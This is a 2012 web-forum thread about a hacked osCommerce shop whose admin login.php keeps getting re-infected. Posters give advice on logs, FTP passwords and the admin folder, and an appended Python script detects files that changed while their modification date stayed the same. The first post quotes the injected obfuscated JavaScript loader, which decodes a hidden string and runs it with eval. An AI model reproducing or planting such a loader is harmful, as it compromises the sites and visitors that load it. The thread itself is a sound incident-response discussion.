sactown Posted January 14, 2012

I am running 2.2rc2, but I have been keeping it updated with bug updates and patches, like the ones pinned to this forum and the update guides. Here is the code I keep getting injected back into my admin login.php file every week. Anyone else getting this also? The file's date does not get modified. This seems like the only file affected.

<body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0" bgcolor="#FFFFFF" onload="SetFocus();">
<ad><script type='text/javascript'>this.b=this.M="";this.A="";this.w=false;this.N=""; (function(c){this.m=false;this.J="";this.G=this.e=this.l=false;var g=window;this.i="";var d=g["unescap"+unescape("%65")],h=String["f"+unescape("%72%6f%6d%43%68%61%72%43%6f%64%65")];this.C="qO";this.B="oB";var a=new String("");this.I="sW";var e=new String("%");this.d="";for(var f=0;f<c["le"+unescape("%6e%67%74%68")];f+=2){this.c="cO";this.Q=38178;a+=e+c["su"+unescape("%62%73%74%72")](f,2)}c=d(a);this.u=false;this.o="jP";this.j=false;this.k="gZ";this.s=false;d="";for(a=0;a<c["le"+unescape("%6e%67%74%68")];a++){this.H= this.h="";this.P=43510;this.r=this.z="";this.v=37015;this.F="qY";this.L=62857;this.g="eS";e=c["char"+unescape("%43%6f%64%65%41%74")](a);this.D=false;e^=232;this.q=36524;d+=h(e);this.R=this.p=""}this.f="dX";this.a="";g["e"+unescape("%76%61%6c")](d);this.t=this.K=false;return d})("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"); this.n=3279;this.O=58441;</script></ad>
<b1><!--f9mYZ4E7eNrTT07MycksKdfPSMxNSczL1M/JT8/M0yvIKLC1tTU0MjMyszAzNTUGABfJDKI=--></b1>
<!-- header //-->
<?php require(DIR_WS_INCLUDES . 'header.php'); ?>
<!-- header_eof //-->
Guest Posted January 14, 2012

Moses,

If you have patched your site and are still getting hacked, it is because the hacker has:

1) Added a backdoor to your server to access it anytime.
2) Your FTP password to access your server anytime.

Chris
geoffreywalton Posted January 14, 2012

Have a look at the FTP access logs and site logs at the time the file is updated. Maybe you can see something suspicious.

HTH

G
sactown (Author) Posted January 14, 2012

I use GoDaddy hosting. I will try to email their support for the FTP logs. Not sure if I have to pay for other site stats, but I will look into it. I also scanned my computers for adware/malware/viruses with a couple of different programs just to make sure it is not my computers, and I got nothing.
sactown (Author) Posted January 14, 2012

I was able to get the Apache traffic logs. Will go through them and see what I can find out.
Guest Posted January 14, 2012

It does sound like they've gotten in through a security flaw on the server or gained access through FTP or maybe even the hosting control panel. If you haven't done the following already...

1. Contact your hosting immediately about the problem; if you can't access the logs, they sure can.
2. Change your FTP password.
3. Add/modify the HTAccess file in the admin folder to limit access by password or IP address. At least then it will stop rogue bots scouring the admin folder.
4. Remove the File_Manager.php file from your admin folder. This has been a well documented issue.
geoffreywalton Posted January 14, 2012

Filemanager was only an issue because of the login workaround. If the site is secure, file manager is fine to be on the server. Personally I remove it because I always edit locally on a copy.

Cheers

G
This topic is now archived and is closed to further replies.
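
An added example, not written by any poster in this thread: because the file's date reportedly does not change, this sketch compares SHA-256 hashes against a baseline instead, and reports the inode change time so you know which window of the FTP and Apache logs to read. The paths and file contents in `demo()` are constructed, and the ctime behaviour assumes a Linux host.

```python
import hashlib
import os
import tempfile
from datetime import datetime, timezone

def snapshot(root):
    """Map each .php file under root to (sha256 hex digest, mtime in ns)."""
    state = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in (f for f in files if f.endswith(".php")):
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            state[os.path.relpath(path, root)] = (digest, os.stat(path).st_mtime_ns)
    return state

def compare(root, baseline):
    """Return findings for files whose content differs from the baseline."""
    findings, current = [], snapshot(root)
    for rel, (digest, mtime_ns) in sorted(current.items()):
        old = baseline.get(rel)
        if old is None:
            findings.append({"file": rel, "status": "new"})
        elif old[0] != digest:
            ctime = os.stat(os.path.join(root, rel)).st_ctime
            findings.append({
                "file": rel, "status": "modified",
                # True: content changed but the modification date matches the baseline
                "mtime_preserved": old[1] == mtime_ns,
                # On Linux the kernel sets ctime on every write or metadata
                # change, so it marks when the file was really touched
                "changed_at_utc": datetime.fromtimestamp(ctime, timezone.utc).isoformat(),
            })
    for rel in sorted(set(baseline) - set(current)):
        findings.append({"file": rel, "status": "missing"})
    return findings

def demo():
    """Constructed scenario: admin/login.php is altered, then its date is put back."""
    with tempfile.TemporaryDirectory() as root:
        os.mkdir(os.path.join(root, "admin"))
        target = os.path.join(root, "admin", "login.php")
        with open(target, "w") as fh:
            fh.write("<?php require('includes/application_top.php'); ?>\n")
        baseline = snapshot(root)
        before = os.stat(target)
        with open(target, "a") as fh:
            fh.write("<!-- constructed stand-in for injected markup -->\n")
        os.utime(target, ns=(before.st_atime_ns, before.st_mtime_ns))
        return compare(root, baseline)
```

Keep the baseline somewhere the web server account cannot write, and take it from a known-clean copy of the site.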